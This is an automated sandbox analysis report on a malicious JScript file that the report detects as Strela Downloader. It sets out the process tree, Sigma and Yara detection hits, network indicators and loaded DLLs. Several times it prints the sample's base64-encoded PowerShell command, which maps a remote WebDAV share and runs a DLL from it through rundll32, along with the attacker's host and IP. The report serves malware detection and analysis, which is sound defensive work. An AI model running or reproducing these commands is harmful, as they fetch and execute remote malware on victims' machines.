Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1933725401135087429.js

Overview

General Information

Sample name:1933725401135087429.js
Analysis ID:1544365
MD5:3bf62f4dcf2f2b9c41911a580d81759b
SHA1:24aeadf59eb8d7c57c3410742bb6c09b0582e9bf
SHA256:c15c58f6227d072a056e2dbcf182b61e8f0fa781eaead5a62d1048eb4fd53151
Infos:

Detection

Strela Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 432 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 3784 cmdline: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 5616 cmdline: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5060JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_5060.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry, CommandLine: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5060, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry, ProcessId: 5616, ProcessName: rundll32.exe
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js", ProcessId: 432, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 94.159.113.48, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 3784, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49709
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 432, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, ProcessId: 5060, ProcessName: powershell.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js", ProcessId: 432, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 432, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, ProcessId: 5060, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5060, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, ProcessId: 3784, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5060, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, ProcessId: 3784, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Software Vulnerabilities

      barindex
      Source: 1933725401135087429.jsArgument value : ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgA']Go to definition
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\System32\rundll32.exe

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49709
      Source: global trafficTCP traffic: 192.168.2.6:49709 -> 94.159.113.48:8888
      Source: Joe Sandbox ViewIP Address: 94.159.113.48 94.159.113.48
      Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: apitestlabs.com
      Source: net.exe, 00000004.00000002.2156330950.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2156391685.0000020DA0B2D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2155966637.0000020DA0B2A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2156027225.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apitestlabs.com:8888/
      Source: net.exe, 00000004.00000003.2155966637.0000020DA0B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apitestlabs.com:8888/%
      Source: net.exe, 00000004.00000002.2156330950.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2156027225.0000020DA0B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apitestlabs.com:8888/V7
      Source: net.exe, 00000004.00000002.2156287584.0000020DA0AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apitestlabs.com:8888/em
      Source: powershell.exe, 00000002.00000002.2158767347.00000246A1F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2158767347.00000246A1F72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2158767347.00000246A1F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_5060.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5060, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD345B205D2_2_00007FFD345B205D
      Source: 1933725401135087429.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3zsr2ev.mv3.ps1Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: rasadhlp.dllJump to behavior
